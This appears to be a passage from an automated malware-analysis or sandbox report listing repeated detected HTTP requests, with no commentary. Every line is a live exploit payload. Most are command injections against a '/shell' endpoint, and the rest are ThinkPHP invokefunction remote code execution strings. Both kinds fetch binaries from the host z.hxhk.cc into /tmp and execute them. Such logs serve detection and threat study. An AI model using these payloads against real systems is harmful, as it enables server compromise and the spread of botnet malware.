Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
